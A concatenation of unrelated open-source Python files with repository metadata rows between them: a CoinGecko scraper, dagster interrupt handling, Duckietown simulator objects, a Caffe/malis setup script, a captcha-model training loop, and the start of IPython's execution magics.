    pandas.DataFrame
        Top Decentralized Finance Coins
        Columns: Rank, Name, Symbol, Price, Change_1h, Change_24h, Change_7d, Volume_24h, Market_Cap, Url
    """
    page_url = "https://www.coingecko.com/en/defi"
    rows = scrape_gecko_data(page_url).find("tbody").find_all("tr")
    results = []
    for row in rows:
        row_cleaned = clean_row(row)
        # Drop the 3rd scraped cell — presumably a duplicated/badge cell; verify
        row_cleaned.pop(2)
        # Per-coin detail link. (Previously this rebound the name `url`,
        # shadowing the page URL inside the loop.)
        coin_url = GECKO_BASE_URL + row.find("a")["href"]
        row_cleaned.append(coin_url)
        # Rows with only 11 cells are padded with "?" at position 4 —
        # presumably a missing Price cell; TODO confirm against live markup
        if len(row_cleaned) == 11:
            row_cleaned.insert(4, "?")
        results.append(row_cleaned)
    df = pd.DataFrame(
        results,
        columns=[
            "Rank",
            "Name",
            "Symbol",
            "Price",
            "Change_1h",
            "Change_24h",
            "Change_7d",
            "Volume_24h",
            "Market_Cap",
            "Fully Diluted Market Cap",
            "Market Cap to TVL Ratio",
            "Url",
        ],
    )
    # These two scraped columns are not part of the returned schema
    df.drop(
        ["Fully Diluted Market Cap", "Market Cap to TVL Ratio"],
        axis=1,
        inplace=True,
    )
    df["Rank"] = df["Rank"].astype(int)
    # "$1,234.56" -> 1234.56
    df["Price"] = df["Price"].apply(lambda x: float(x.strip("$").replace(",", "")))
    return df
def get_top_dexes() -> pd.DataFrame:
    """Scrapes top decentralized exchanges from "https://www.coingecko.com/en/dex" [Source: CoinGecko]

    Returns
    -------
    pandas.DataFrame
        Top Decentralized Crypto Exchanges
        Columns: Name, Rank, Volume_24h, Coins, Pairs, Visits, Most_Traded, Market_Share
    """
    columns = [
        "Name",
        "Rank",
        "Volume_24h",
        "Coins",
        "Pairs",
        "Visits",
        "Most_Traded",
        "Market_Share",
    ]
    url = "https://www.coingecko.com/en/dex"
    rows = scrape_gecko_data(url).find("tbody").find_all("tr")
    results = []
    for row in rows:
        row_cleaned = clean_row(row)
        # The "Trading Incentives" badge adds a spurious cell; drop it
        if " Trading Incentives" in row_cleaned:
            row_cleaned.remove(" Trading Incentives")
        # Rows with 8 cells are presumably missing one value; pad with "N/A"
        # near the tail — TODO confirm which column against live markup
        if len(row_cleaned) == 8:
            row_cleaned.insert(-3, "N/A")
        results.append(row_cleaned)
    df = pd.DataFrame(results)
    # Exchange name is split across two scraped cells; merge them
    df["Name"] = df.iloc[:, 1] + " " + df.iloc[:, 2].replace("N/A", "")
    df.drop(df.columns[1:3], axis=1, inplace=True)
    df = swap_columns(df)
    df.columns = columns
    # Keep only the text before the "$..." amount; strip thousands separators
    df["Most_Traded"] = (
        df["Most_Traded"]
        .apply(lambda x: x.split("$")[0])
        .str.replace(",", "", regex=True)
        .str.replace(".", "", regex=True)
    )
    # Purely numeric leftovers mean no traded-pair name was present
    df["Most_Traded"] = df["Most_Traded"].apply(lambda x: None if x.isdigit() else x)
    df["Rank"] = df["Rank"].astype(int)
    # set_index + reset_index moves Rank to the first column position
    df.set_index("Rank", inplace=True)
    return df.reset_index()
def get_top_nfts() -> pd.DataFrame:
    """Scrapes top nfts from "https://www.coingecko.com/en/nft" [Source: CoinGecko]

    Returns
    -------
    pandas.DataFrame
        Top NFTs (Non-Fungible Tokens)
        Columns: Rank, Name, Symbol, Price, Change_1h, Change_24h, Change_7d, Volume_24h, Market_Cap, Url
    """
    url = "https://www.coingecko.com/en/nft"
    rows = scrape_gecko_data(url).find("tbody").find_all("tr")
    results = []
    for row in rows:
        # Per-NFT detail link
        link = GECKO_BASE_URL + row.find("a")["href"]
        row_cleaned = clean_row(row)
        # Rows with only 9 cells are padded with "N/A" at position 5 —
        # presumably a missing change/volume cell; TODO confirm
        if len(row_cleaned) == 9:
            row_cleaned.insert(5, "N/A")
        row_cleaned.append(link)
        # Drop the 4th scraped cell — presumably a duplicated/badge cell; verify
        row_cleaned.pop(3)
        results.append(row_cleaned)
    df = pd.DataFrame(
        results,
        columns=[
            "Rank",
            "Name",
            "Symbol",
            "Price",
            "Change_1h",
            "Change_24h",
            "Change_7d",
            "Volume_24h",
            "Market_Cap",
            "Url",
        ],
    )
    df["Rank"] = df["Rank"].astype(int)
    # Strip "$" and thousands separators; note Price stays a string here
    # (unlike the other scrapers, there is no float() conversion)
    df["Price"] = df["Price"].apply(lambda x: x.strip("$").replace(",", ""))
    return df
def get_coin_list() -> pd.DataFrame:
    """Get list of coins available on CoinGecko [Source: CoinGecko]

    Returns
    -------
    pandas.DataFrame
        Coins available on CoinGecko
        Columns: id, symbol, name
    """
    api = CoinGeckoAPI()
    coins = pd.DataFrame(api.get_coins_list(), columns=["id", "symbol", "name"])
    return coins.reset_index()
def get_coins_for_given_exchange(exchange_id: str = "binance", page: int = 1) -> dict:
    """Helper method to get all coins available on binance exchange [Source: CoinGecko]

    Parameters
    ----------
    exchange_id: str
        id of exchange
    page: int
        number of page. One page contains 100 records

    Returns
    -------
    dict
        dictionary with all trading pairs on binance
    """
    tickers_page = CoinGeckoAPI().get_exchanges_tickers_by_id(id=exchange_id, page=page)
    return tickers_page["tickers"]
def get_mapping_matrix_for_exchange(exchange_id: str, pages: int = 12) -> dict:
    """Creates a matrix with all coins available on Binance with corresponding coingecko coin_id. [Source: CoinGecko]

    Parameters
    ----------
    exchange_id: str
        id of exchange: binance
    pages: int
        number of pages. One page contains 100 records

    Returns
    -------
    dict
        dictionary with all coins: {"ETH" : "ethereum"}
    """
    coins_dct: dict = {}
    # CoinGecko tickers pages are 1-indexed (see get_coins_for_given_exchange's
    # default page=1); the previous range(pages) started at page 0 and so
    # never fetched the last page.
    for page in range(1, pages + 1):
        coins = get_coins_for_given_exchange(exchange_id=exchange_id, page=page)
        for coin in coins:
            # Keep the first mapping seen for each base symbol
            coins_dct.setdefault(coin["base"], coin["coin_id"])
    return coins_dct
| 28.688259 | 117 | 0.567951 |
795bba4d7f02a170d14d75e7fd70811599931c83 | 2,828 | py | Python | python_modules/dagster/dagster/utils/interrupts.py | souterjk/dagster | 8b744a4959bb04ff9587cfee82a796404fcbc89e | [
"Apache-2.0"
] | null | null | null | python_modules/dagster/dagster/utils/interrupts.py | souterjk/dagster | 8b744a4959bb04ff9587cfee82a796404fcbc89e | [
"Apache-2.0"
] | null | null | null | python_modules/dagster/dagster/utils/interrupts.py | souterjk/dagster | 8b744a4959bb04ff9587cfee82a796404fcbc89e | [
"Apache-2.0"
] | 1 | 2019-09-11T03:02:27.000Z | 2019-09-11T03:02:27.000Z | import signal
import sys
import threading
from contextlib import contextmanager
_received_interrupt = {"received": False}
def setup_interrupt_handlers():
    """Route SIGTERM (and SIGBREAK on Windows) to the current SIGINT handler."""
    sigint_handler = signal.getsignal(signal.SIGINT)
    # Map SIGTERM to SIGINT (for k8s)
    signal.signal(signal.SIGTERM, sigint_handler)
    if sys.platform == "win32":
        # SIGBREAK only exists on Windows
        signal.signal(signal.SIGBREAK, sigint_handler)  # pylint: disable=no-member
def _replace_interrupt_signal(new_signal_handler):
    """Install *new_signal_handler* for SIGINT, then re-map SIGTERM (and
    SIGBREAK on Windows) so they use it too."""
    signal.signal(signal.SIGINT, new_signal_handler)
    # Update any overridden signals to also use the new handler
    setup_interrupt_handlers()
# Wraps code that we don't want a SIGINT to be able to interrupt. Within this context you can
# use pop_captured_interrupt or check_captured_interrupt to check whether or not an interrupt
# has been received within checkpoitns. You can also use additional context managers (like
# raise_execution_interrupts) to override the interrupt signal handler again.
@contextmanager
def capture_interrupts():
    """Context manager that swallows SIGINT, recording it in the module-level
    ``_received_interrupt`` flag instead of raising KeyboardInterrupt.

    Use ``check_captured_interrupt``/``pop_captured_interrupt`` inside the
    context to observe the flag. The flag is always cleared on exit.
    """
    if threading.current_thread() != threading.main_thread():
        # Can't replace signal handlers when not on the main thread, ignore
        yield
        return
    original_signal_handler = signal.getsignal(signal.SIGINT)

    def _new_signal_handler(_signo, _):
        # Record the interrupt instead of raising
        _received_interrupt["received"] = True

    signal_replaced = False
    try:
        _replace_interrupt_signal(_new_signal_handler)
        signal_replaced = True
        yield
    finally:
        if signal_replaced:
            # Restore whatever handler was active on entry
            _replace_interrupt_signal(original_signal_handler)
        # Discard any interrupt that was captured but never consumed
        _received_interrupt["received"] = False
def check_captured_interrupt():
    """Return True if an interrupt was captured, without clearing the flag."""
    return _received_interrupt["received"]
def pop_captured_interrupt():
    """Return whether an interrupt was captured, clearing the flag."""
    was_received, _received_interrupt["received"] = (
        _received_interrupt["received"],
        False,
    )
    return was_received
# During execution, enter this context during a period when interrupts should be raised immediately
# (as a DagsterExecutionInterruptedError instead of a KeyboardInterrupt)
@contextmanager
def raise_interrupts_as(error_cls):
    """Within this context, SIGINT immediately raises *error_cls* instead of
    KeyboardInterrupt. Any interrupt already captured (via
    ``capture_interrupts``) before entry is also re-raised as *error_cls*.
    """
    if threading.current_thread() != threading.main_thread():
        # Can't replace signal handlers when not on the main thread, ignore
        yield
        return
    original_signal_handler = signal.getsignal(signal.SIGINT)

    def _new_signal_handler(signo, _):
        raise error_cls()

    signal_replaced = False
    try:
        _replace_interrupt_signal(_new_signal_handler)
        signal_replaced = True
        # Raise if the previous signal handler received anything
        if _received_interrupt["received"]:
            _received_interrupt["received"] = False
            raise error_cls()
        yield
    finally:
        if signal_replaced:
            # Restore the handler that was active on entry
            _replace_interrupt_signal(original_signal_handler)
| 31.076923 | 100 | 0.730552 |
795bba8377d816082a3c25d3bcbb76119e07e29d | 6,079 | py | Python | gym_duckietown/objects.py | abdelq/gym-duckietown | 189392eab698b26db5e253b2a7fbe063b6e5e410 | [
"MIT"
] | null | null | null | gym_duckietown/objects.py | abdelq/gym-duckietown | 189392eab698b26db5e253b2a7fbe063b6e5e410 | [
"MIT"
] | null | null | null | gym_duckietown/objects.py | abdelq/gym-duckietown | 189392eab698b26db5e253b2a7fbe063b6e5e410 | [
"MIT"
] | null | null | null | import numpy as np
from .collision import *
import pyglet
from pyglet.gl import *
class WorldObj:
    """A static world object (mesh + pose + collision geometry).

    Dynamic objects subclass this and must override check_collision,
    proximity and step.
    """
    def __init__(self, obj, domain_rand, safety_radius_mult):
        """
        Initializes the object and its properties
        """
        # obj is a dict describing the object (kind, mesh, pos, scale, ...)
        self.process_obj_dict(obj, safety_radius_mult)
        self.domain_rand = domain_rand
        # y_rot is degrees; angle is the same rotation in radians
        self.angle = self.y_rot * (math.pi / 180)
        self.generate_geometry()

    def generate_geometry(self):
        """Compute the 2D collision corners and their normals."""
        # Find corners and normal vectors assoc w. object
        self.obj_corners = generate_corners(self.pos,
                                            self.min_coords, self.max_coords, self.angle, self.scale)
        self.obj_norm = generate_norm(self.obj_corners)

    def process_obj_dict(self, obj, safety_radius_mult):
        """Copy fields out of the object dict onto this instance."""
        self.kind = obj['kind']
        self.mesh = obj['mesh']
        self.pos = obj['pos']
        self.scale = obj['scale']
        self.y_rot = obj['y_rot']
        self.optional = obj['optional']
        self.min_coords = obj['mesh'].min_coords
        self.max_coords = obj['mesh'].max_coords
        self.static = obj['static']
        self.safety_radius = safety_radius_mult *\
            calculate_safety_radius(self.mesh, self.scale)
        # NOTE(review): duplicate assignment — optional was already set above
        self.optional = obj['optional']

    def render(self, draw_bbox):
        """
        Renders the object to screen
        """
        # NOTE(review): relies on self.visible / self.color being set by the
        # creator or a subclass — neither is assigned in this class; confirm.
        if not self.visible:
            return
        # Draw the bounding box
        if draw_bbox:
            glColor3f(1, 0, 0)
            glBegin(GL_LINE_LOOP)
            glVertex3f(self.obj_corners.T[0, 0], 0.01, self.obj_corners.T[1, 0])
            glVertex3f(self.obj_corners.T[0, 1], 0.01, self.obj_corners.T[1, 1])
            glVertex3f(self.obj_corners.T[0, 2], 0.01, self.obj_corners.T[1, 2])
            glVertex3f(self.obj_corners.T[0, 3], 0.01, self.obj_corners.T[1, 3])
            glEnd()
        glPushMatrix()
        glTranslatef(*self.pos)
        glScalef(self.scale, self.scale, self.scale)
        glRotatef(self.y_rot, 0, 1, 0)
        glColor3f(*self.color)
        self.mesh.render()
        glPopMatrix()

    # Below are the functions that need to
    # be reimplemented for any dynamic object
    def check_collision(self, agent_corners, agent_norm):
        """
        See if the agent collided with this object
        For static, return false (static collisions checked w
        numpy in a batch operation)
        """
        if not self.static:
            raise NotImplementedError
        return False

    def proximity(self, agent_pos, agent_safety_rad):
        """
        See if the agent is too close to this object
        For static, return 0 (static safedriving checked w
        numpy in a batch operation)
        """
        if not self.static:
            raise NotImplementedError
        return 0.0

    def step(self, delta_time):
        """
        Use a motion model to move the object in the world
        """
        if not self.static:
            raise NotImplementedError
class DuckieObj(WorldObj):
    """A pedestrian duckie that repeatedly waits, walks a fixed distance
    across the road (with a sinusoidal waddle), then turns around."""
    def __init__(self, obj, domain_rand, safety_radius_mult, walk_distance):
        super().__init__(obj, domain_rand, safety_radius_mult)
        # Extra margin so the duckie fully clears the crossing
        self.walk_distance = walk_distance + 0.25
        # Dynamic duckie stuff
        # Randomize velocity and wait time
        if self.domain_rand:
            self.pedestrian_wait_time = np.random.randint(3, 20)
            self.vel = np.abs(np.random.normal(0.02, 0.005))
        else:
            self.pedestrian_wait_time = 8
            self.vel = 0.02
        # Movement parameters
        self.heading = heading_vec(self.angle)
        self.start = np.copy(self.pos)
        self.center = self.pos
        self.pedestrian_active = False
        # Walk wiggle parameter (amplitude of the waddle, in radians)
        self.wiggle = np.random.choice([14, 15, 16], 1)
        self.wiggle = np.pi / self.wiggle
        self.time = 0

    def check_collision(self, agent_corners, agent_norm):
        """
        See if the agent collided with this object
        """
        return intersects_single_obj(
            agent_corners,
            self.obj_corners.T,
            agent_norm,
            self.obj_norm
        )

    def proximity(self, agent_pos, agent_safety_rad):
        """
        See if the agent is too close to this object
        based on a heuristic for the "overlap" between
        their safety circles
        """
        d = np.linalg.norm(agent_pos - self.center)
        score = d - agent_safety_rad - self.safety_radius
        # Negative when the safety circles overlap; 0 otherwise
        return min(0, score)

    def step(self, delta_time):
        """
        Use a motion model to move the object in the world
        """
        self.time += delta_time
        # If not walking, no need to do anything
        if not self.pedestrian_active:
            self.pedestrian_wait_time -= delta_time
            if self.pedestrian_wait_time <= 0:
                self.pedestrian_active = True
            return
        # Update centers and bounding box
        vel_adjust = self.heading * self.vel
        self.center += vel_adjust
        # Corners move in the 2D ground plane (x, z components)
        self.obj_corners += vel_adjust[[0, -1]]
        distance = np.linalg.norm(self.center - self.start)
        if distance > self.walk_distance:
            self.finish_walk()
        self.pos = self.center
        # Sinusoidal waddle around the walking direction
        angle_delta = self.wiggle * math.sin(48 * self.time)
        self.y_rot = (self.angle + angle_delta) * (180 / np.pi)
        self.obj_norm = generate_norm(self.obj_corners)

    def finish_walk(self):
        """
        After duckie crosses, update relevant attributes
        (vel, rot, wait time until next walk)
        """
        self.start = np.copy(self.center)
        # Turn around for the return trip
        self.angle += np.pi
        self.pedestrian_active = False
        if self.domain_rand:
            # Assign a random velocity (in opp. direction) and a wait time
            self.vel = -1 * np.sign(self.vel) * np.abs(np.random.normal(0.02, 0.005))
            self.pedestrian_wait_time = np.random.randint(3, 20)
        else:
            # Just give it the negative of its current velocity
            self.vel *= -1
            self.pedestrian_wait_time = 8
| 31.827225 | 85 | 0.595822 |
795bbaf6e33f31984f169011542b14c3468a139f | 4,465 | py | Python | manual_setup/system_calls.py | Rekrau/PyGreentea | 457d7dc5be12b15c3c7663ceaf6d74301de56e43 | [
"BSD-2-Clause"
] | null | null | null | manual_setup/system_calls.py | Rekrau/PyGreentea | 457d7dc5be12b15c3c7663ceaf6d74301de56e43 | [
"BSD-2-Clause"
] | 4 | 2016-04-22T15:39:21.000Z | 2016-11-15T21:23:58.000Z | manual_setup/system_calls.py | Rekrau/PyGreentea | 457d7dc5be12b15c3c7663ceaf6d74301de56e43 | [
"BSD-2-Clause"
] | 4 | 2017-05-12T00:17:55.000Z | 2019-07-01T19:23:32.000Z | import inspect
import multiprocessing
import os
import platform
import sys
def setup_paths(caffe_path, malis_path):
    """Make this script's directory plus the caffe/malis python dirs importable.

    Absolute (deduplicated) paths are appended first; the raw relative
    "<caffe>/python" and "<malis>/python" strings are always appended last.
    """
    base = os.path.split(inspect.getfile(inspect.currentframe()))[0]
    candidates = (
        os.path.realpath(os.path.abspath(base)),
        os.path.realpath(os.path.abspath(os.path.join(base, caffe_path + "/python"))),
        os.path.realpath(os.path.abspath(os.path.join(base, malis_path))),
    )
    for candidate in candidates:
        if candidate not in sys.path:
            sys.path.append(candidate)
    sys.path.append(caffe_path + "/python")
    sys.path.append(malis_path + "/python")
def linux_distribution():
    """Return ``platform.linux_distribution()`` or "N/A" when unavailable.

    ``platform.linux_distribution`` was deprecated in Python 3.5 and removed
    in 3.8, so on modern interpreters this always returns "N/A".
    """
    try:
        return platform.linux_distribution()
    except Exception:  # narrowed from bare except: don't swallow SystemExit/KeyboardInterrupt
        return "N/A"
def sys_info():
    """Print interpreter and platform details (useful for diagnostics)."""
    # NOTE(review): platform.dist() was removed in Python 3.8 and would raise
    # AttributeError here on modern interpreters — confirm target version.
    print("""Python version: %s
dist: %s
linux_distribution: %s
system: %s
machine: %s
platform: %s
uname: %s
version: %s
mac_ver: %s
""" % (
        sys.version.split('\n'),
        str(platform.dist()),
        linux_distribution(),
        platform.system(),
        platform.machine(),
        platform.platform(),
        platform.uname(),
        platform.version(),
        platform.mac_ver(),
    ))
def install_dependencies():
    """Install build/runtime dependencies via the distro package manager.

    Dispatches on the detected distribution; each branch shells out with
    os.system and ignores individual command failures.
    """
    # We support Fedora (22/23/24) and Ubuntu (14.05/15.05)
    if (linux_distribution()[0].lower() == "fedora"):
        # TODO: Add missing Fedora packages
        os.system('dnf install -y git gcc')
        os.system('dnf install -y protobuf-python protobuf-c protobuf-compiler')
        os.system('dnf install -y boost-system boost-devel boost-python')
        os.system('dnf install -y glog glog-devel gflags gflags-devel')
        os.system('dnf install -y python python-devel python-pip')
        os.system('dnf install -y atlas atlas-sse2 atlas-sse3')
        os.system('dnf install -y openblas openblas-devel openblas-openmp64 openblas-openmp openblas-threads64 openblas-threads')
        os.system('dnf install -y opencl-headers')
    if (linux_distribution()[0].lower() == "ubuntu"):
        # TODO: Add missing Ubuntu packages
        os.system('apt-get update -y')
        os.system('apt-get install -y git gcc')
        os.system('apt-get install -y libprotobuf-dev libleveldb-dev libsnappy-dev libopencv-dev libboost-all-dev libhdf5-serial-dev')
        os.system('apt-get install -y protobuf-compiler gfortran libjpeg62 libfreeimage-dev libatlas-base-dev')
        os.system('apt-get install -y libopenblas-base libopenblas-dev')
        os.system('apt-get install -y libgoogle-glog-dev libbz2-dev libxml2-dev libxslt-dev libffi-dev libssl-dev libgflags-dev liblmdb-dev')
        os.system('apt-get install -y python-dev python-pip python-yaml')
        os.system('apt-get install -y libviennacl-dev opencl-headers')
    # Python-level deps are installed regardless of distro
    os.system('pip install --upgrade pip')
    os.system('pip install cython')
def compile_malis(path):
    """Run malis' build script (``sh make.sh``) inside *path*.

    The caller's working directory is now restored even if an exception is
    raised mid-build, so a failure no longer strands the process in *path*.
    """
    cwd = os.getcwd()
    os.chdir(path)
    try:
        os.system('sh make.sh')
    finally:
        os.chdir(cwd)
def compile_caffe(path):
    """Build Caffe (native targets plus pycaffe) in *path* with all CPU cores.

    Exits the process with make's status code if either build step fails.
    """
    cpus = multiprocessing.cpu_count()
    cwd = os.getcwd()
    os.chdir(path)
    # Copy the default Caffe configuration if not existing
    os.system("cp -n Makefile.config.example Makefile.config")
    for target in ("all", "pycaffe"):
        result = os.system("make %s -j %s" % (target, cpus))
        if result != 0:
            sys.exit(result)
    os.chdir(cwd)
def clone_malis(path, clone, update):
    """Clone and/or ``git pull`` the malis repository at *path*."""
    if clone:
        os.system('git clone https://github.com/srinituraga/malis.git %s' % path)
    if not update:
        return
    previous_dir = os.getcwd()
    os.chdir(path)
    os.system('git pull')
    os.chdir(previous_dir)
def clone_caffe(path, clone, update):
    """Clone and/or ``git pull`` the caffe repository at *path*."""
    if clone:
        os.system('git clone https://github.com/naibaf7/caffe.git %s' % path)
    if not update:
        return
    previous_dir = os.getcwd()
    os.chdir(path)
    os.system('git pull')
    os.chdir(previous_dir)
def set_environment_vars():
    """Set OpenCL tuning environment variables.

    Fix up OpenCL variables. Can interfere with the frame buffer if the GPU
    is also a display driver.
    """
    opencl_settings = {
        "GPU_MAX_ALLOC_PERCENT": "100",
        "GPU_SINGLE_ALLOC_PERCENT": "100",
        "GPU_MAX_HEAP_SIZE": "100",
        "GPU_FORCE_64BIT_PTR": "1",
    }
    os.environ.update(opencl_settings)
| 34.083969 | 150 | 0.64972 |
795bbb995b2199179c32741261a83f9a18eec48a | 54 | py | Python | acmicpc/15894/15894.py | love-adela/algorithm | 4ccd02173c96f8369962f1fd4e5166a221690fa2 | [
"MIT"
] | 3 | 2019-03-09T05:19:23.000Z | 2019-04-06T09:26:36.000Z | acmicpc/15894/15894.py | love-adela/algorithm | 4ccd02173c96f8369962f1fd4e5166a221690fa2 | [
"MIT"
] | 1 | 2020-02-23T10:38:04.000Z | 2020-02-23T10:38:04.000Z | acmicpc/15894/15894.py | love-adela/algorithm | 4ccd02173c96f8369962f1fd4e5166a221690fa2 | [
"MIT"
] | 1 | 2019-05-22T13:47:53.000Z | 2019-05-22T13:47:53.000Z | import sys
n = int(sys.stdin.readline())
print(4 * n)
| 13.5 | 29 | 0.666667 |
795bbbdd194aa04f498c0f4a94c9475d5eb5e2bb | 7,397 | py | Python | utils/train.py | wingeva1986/dddd_trainer | 608bfec699446040aea205387c9a2129ea5fa575 | [
"Apache-2.0"
] | 1 | 2022-03-01T00:51:46.000Z | 2022-03-01T00:51:46.000Z | utils/train.py | wingeva1986/dddd_trainer | 608bfec699446040aea205387c9a2129ea5fa575 | [
"Apache-2.0"
] | null | null | null | utils/train.py | wingeva1986/dddd_trainer | 608bfec699446040aea205387c9a2129ea5fa575 | [
"Apache-2.0"
] | null | null | null | import json
import os
import random
import time
import tqdm
from configs import Config
from loguru import logger
from utils import load_cache
from nets import Net
class Train:
    """Training driver for one project.

    Loads the project config, builds the network, restores the newest
    checkpoint if any, then runs the train/eval loop until the configured
    accuracy/epoch/loss targets are met — at which point the model is
    exported to ONNX (with its charset) and the process exits.
    """
    def __init__(self, project_name: str):
        self.project_name = project_name
        # Project layout: <repo>/projects/<name>/{checkpoints,models}
        self.project_path = os.path.join(
            os.path.dirname(os.path.dirname(os.path.abspath(__file__))),
            "projects", project_name)
        self.checkpoints_path = os.path.join(self.project_path, "checkpoints")
        self.models_path = os.path.join(self.project_path, "models")
        self.epoch = 0
        self.step = 0
        self.config = Config(project_name)
        self.conf = self.config.load_config()
        # Cadences and stopping targets from the project config
        self.test_step = self.conf['Train']['TEST_STEP']
        self.save_checkpoints_step = self.conf['Train']['SAVE_CHECKPOINTS_STEP']
        self.target = self.conf['Train']['TARGET']
        self.target_acc = self.target['Accuracy']
        self.min_epoch = self.target['Epoch']
        self.max_loss = self.target['Cost']
        logger.info("\nTaget:\nmin_Accuracy: {}\nmin_Epoch: {}\nmax_Loss: {}".format(
            self.target_acc, self.min_epoch, self.max_loss))
        logger.info("\nBuilding Net...")
        self.net = Net(self.conf)
        logger.info(self.net)
        logger.info("\nBuilding End")
        # Device selection: GPU id from config, or CPU fallback (-1)
        self.use_gpu = self.conf['System']['GPU']
        if self.use_gpu:
            self.gpu_id = self.conf['System']['GPU_ID']
            logger.info("\nUSE GPU ----> {}".format(self.gpu_id))
            self.device = self.net.get_device(self.gpu_id)
            self.net.to(self.device)
        else:
            self.gpu_id = -1
            self.device = self.net.get_device(self.gpu_id)
            logger.info("\nUSE CPU".format(self.gpu_id))
        # Resume from the checkpoint with the highest step number, if any.
        # Checkpoint filenames look like checkpoint_<project>_<epoch>_<step>.tar
        logger.info("\nSearch for history checkpoints...")
        history_checkpoints = os.listdir(self.checkpoints_path)
        if len(history_checkpoints) > 0:
            history_step = 0
            newer_checkpoint = None
            for checkpoint in history_checkpoints:
                checkpoint_name = checkpoint.split(".")[0].split("_")
                if int(checkpoint_name[2]) > history_step:
                    newer_checkpoint = checkpoint
                    history_step = int(checkpoint_name[2])
            self.epoch, self.step, self.lr = self.net.load_checkpoint(
                os.path.join(self.checkpoints_path, newer_checkpoint))
            self.epoch += 1
            self.step += 1
            self.net.lr = self.lr
        else:
            logger.info("\nEmpty history checkpoints")
        logger.info("\nGet Data Loader...")
        loaders = load_cache.GetLoader(project_name)
        self.train = loaders.loaders['train']
        self.val = loaders.loaders['val']
        del loaders
        logger.info("\nGet Data Loader End!")
        self.loss = 0
        self.avg_loss = 0
        self.start_time = time.time()
        self.now_time = time.time()

    def start(self):
        """Run the train loop: log every 100 steps, checkpoint every
        save_checkpoints_step steps, evaluate every test_step steps, and
        export + exit once the targets are reached."""
        val_iter = iter(self.val)
        while True:
            for idx, (inputs, labels, labels_length) in enumerate(self.train):
                self.now_time = time.time()
                inputs = self.net.variable_to_device(inputs, device=self.device)
                loss, lr = self.net.trainer(inputs, labels, labels_length)
                self.avg_loss += loss
                self.step += 1
                # Periodic progress log (skipped when it coincides with a test step)
                if self.step % 100 == 0 and self.step % self.test_step != 0:
                    logger.info("{}\tEpoch: {}\tStep: {}\tLastLoss: {}\tAvgLoss: {}\tLr: {}".format(
                        time.strftime("[%Y-%m-%d-%H_%M_%S]", time.localtime(self.now_time)), self.epoch, self.step,
                        str(loss), str(self.avg_loss / 100), lr
                    ))
                    self.avg_loss = 0
                # Periodic checkpoint (also advances the LR scheduler)
                if self.step % self.save_checkpoints_step == 0 and self.step != 0:
                    model_path = os.path.join(self.checkpoints_path, "checkpoint_{}_{}_{}.tar".format(
                        self.project_name, self.epoch, self.step,
                    ))
                    self.net.scheduler.step()
                    self.net.save_model(model_path,
                                        {"net": self.net.state_dict(), "optimizer": self.net.optimizer.state_dict(),
                                         "epoch": self.epoch, "step": self.step, "lr": lr})
                # Periodic evaluation on one validation batch
                if self.step % self.test_step == 0:
                    try:
                        test_inputs, test_labels, test_labels_length = next(val_iter)
                    except Exception:
                        # Validation iterator exhausted — restart it
                        del val_iter
                        val_iter = iter(self.val)
                        test_inputs, test_labels, test_labels_length = next(val_iter)
                    # Skip tiny batches; accuracy on them is too noisy
                    if test_inputs.shape[0] < 5:
                        continue
                    test_inputs = self.net.variable_to_device(test_inputs, self.device)
                    self.net = self.net.train(False)
                    pred_labels, labels_list, correct_list, error_list = self.net.tester(test_inputs, test_labels,
                                                                                         test_labels_length)
                    self.net = self.net.train()
                    accuracy = len(correct_list) / test_inputs.shape[0]
                    logger.info("{}\tEpoch: {}\tStep: {}\tLastLoss: {}\tAvgLoss: {}\tLr: {}\tAcc: {}".format(
                        time.strftime("[%Y-%m-%d-%H_%M_%S]", time.localtime(self.now_time)), self.epoch, self.step,
                        str(loss), str(self.avg_loss / 100), lr, accuracy
                    ))
                    self.avg_loss = 0
                    # NOTE(review): avg_loss was just reset to 0 above, so the
                    # `self.avg_loss < self.max_loss` clause is always true here.
                    if accuracy > self.target_acc and self.epoch > self.min_epoch and self.avg_loss < self.max_loss:
                        logger.info("\nTraining Finished!Exporting Model...")
                        dummy_input = self.net.get_random_tensor()
                        input_names = ["input1"]
                        output_names = ["output"]
                        # EfficientNet's memory-efficient swish is not ONNX-exportable
                        if self.net.backbone.startswith("effnet"):
                            self.net.cnn.set_swish(memory_efficient=False)
                        self.net = self.net.eval().cpu()
                        # Dynamic axes: variable image width in, variable sequence out
                        dynamic_ax = {'input1': {3: 'image_wdith'}, "output": {1: 'seq'}}
                        self.net.export_onnx(self.net, dummy_input,
                                             os.path.join(self.models_path, "{}_{}_{}_{}_{}.onnx".format(
                                                 self.project_name, str(accuracy), self.epoch, self.step,
                                                 time.strftime("%Y-%m-%d-%H-%M-%S", time.localtime(self.now_time))))
                                             , input_names, output_names, dynamic_ax)
                        # Persist the charset next to the model for inference
                        with open(os.path.join(self.models_path, "charset.json"), 'w', encoding="utf-8") as f:
                            f.write(json.dumps(self.net.charset, ensure_ascii=False))
                        logger.info("\nExport Finished!Using Time: {}min".format(
                            str(int(int(self.now_time) - int(self.start_time)) / 60)))
                        exit()
            self.epoch += 1
if __name__ == '__main__':
    # Manual smoke-test entry point: train the "test1" project.
    Train("test1")
| 47.11465 | 117 | 0.517913 |
795bbd208d7abb7ac3d7af358f93e9ab4b6c9d6f | 49,552 | py | Python | IPython/core/magics/execution.py | dpsanders/ipython | b8295e9af6745b9c466d11bb31a6eef221e231c1 | [
"BSD-3-Clause-Clear"
] | 1 | 2020-03-12T02:52:13.000Z | 2020-03-12T02:52:13.000Z | IPython/core/magics/execution.py | dpsanders/ipython | b8295e9af6745b9c466d11bb31a6eef221e231c1 | [
"BSD-3-Clause-Clear"
] | null | null | null | IPython/core/magics/execution.py | dpsanders/ipython | b8295e9af6745b9c466d11bb31a6eef221e231c1 | [
"BSD-3-Clause-Clear"
] | null | null | null | # -*- coding: utf-8 -*-
"""Implementation of execution-related magic functions.
"""
#-----------------------------------------------------------------------------
# Copyright (c) 2012 The IPython Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Stdlib
import __builtin__ as builtin_mod
import ast
import bdb
import os
import sys
import time
from StringIO import StringIO
# cProfile was added in Python2.5
try:
import cProfile as profile
import pstats
except ImportError:
# profile isn't bundled by default in Debian for license reasons
try:
import profile, pstats
except ImportError:
profile = pstats = None
# Our own packages
from IPython.core import debugger, oinspect
from IPython.core import magic_arguments
from IPython.core import page
from IPython.core.error import UsageError
from IPython.core.macro import Macro
from IPython.core.magic import (Magics, magics_class, line_magic, cell_magic,
line_cell_magic, on_off, needs_local_scope)
